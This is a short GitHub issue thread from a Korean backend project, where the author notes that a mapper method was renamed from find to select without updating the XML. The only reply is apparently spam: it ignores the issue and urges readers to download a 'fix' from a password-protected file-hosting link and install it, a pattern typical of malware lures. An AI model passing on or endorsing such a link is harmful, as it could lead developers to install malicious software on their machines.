### ISSUE TITLE
[AUTH] authMapper find -> select

### ISSUE THREAD

**Issue by ykc0131** [2nnerPeace/The-Moon-Ha-Backend#43]
## 🍀 Description
find -> select 으로 변경하면서 xml 변경을 빠뜨림 

## ✅ Todo
- [ ] find -> select

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
